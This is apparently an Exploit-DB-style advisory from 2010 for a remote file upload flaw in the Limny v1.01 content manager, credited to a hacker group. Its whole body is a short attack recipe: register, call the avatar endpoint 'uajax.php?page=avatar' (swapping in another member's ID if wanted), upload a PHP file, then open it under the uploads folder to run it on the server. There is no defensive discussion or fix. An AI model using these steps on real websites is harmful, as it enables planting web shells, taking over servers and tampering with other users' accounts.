Limny v1.01 Remote File Upload Vulnerability

# Title: Limny v1.01 Remote File Upload Vulnerability
# EDB-ID: 11377
# CVE-ID: ()
# OSVDB-ID: ()
# Author: jiko
# Published: 2010-02-09
# Verified: yes
# Download Exploit Code
# Download Vulnerable app

----------[exploit Debut]
[Remote File Upload Vulnerability]
----------[Script Info]

Moi    : JIKO
Site    : No-exploit.Com
Email    : :(

----------[Script Info]

Site:http    : limny.org

----------[exploit Info]

1]~[3 Action]
    the first setup register if the register active
http://server/Path/
    the second setup go to edit your  avatar
http://server/limny/uajax.php?page=avatar&id=[ your ID or id for a member you can change here avatar]
    now go to
path/uploads/[your file || jawa.php]

----------[Thanks]
  HxH, Cyb3r-DeViL, The Sadhacker, kasper,  SkuLL-HacKeR Member No-exploit.Com,all friends
----------[exploit Fin]